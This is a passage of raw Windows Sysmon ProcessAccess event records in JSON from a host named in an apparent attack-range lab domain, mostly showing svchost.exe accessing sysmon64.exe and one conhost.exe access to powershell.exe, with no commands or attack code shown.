C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:09","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4873,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:09.346\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:09.346","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:09","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4874,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:09.346\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:09.346","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:09","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4875,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:09.346\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:09.346","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:09","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4876,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:09.346\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:09.346","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:09","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4877,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:09.346\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:09.346","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:09","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4878,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:09.346\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:09.346","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:09","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4879,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:09.346\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:09.346","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:09","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4880,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:09.346\r\nSourceProcessGUID: {41C8662E-20CD-5F25-0000-0010BFA10700}\r\nSourceProcessId: 4376\r\nSourceThreadId: 4204\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-20CD-5F25-0000-00108FB10700}\r\nTargetProcessId: 4652\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:09.346","SourceProcessGUID":"{41C8662E-20CD-5F25-0000-0010BFA10700}","SourceProcessId":"4376","SourceThreadId":"4204","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-20CD-5F25-0000-00108FB10700}","TargetProcessId":"4652","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:09","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4881,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:09.361\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-20CD-5F25-0000-00108FB10700}\r\nTargetProcessId: 4652\r\nTargetImage: 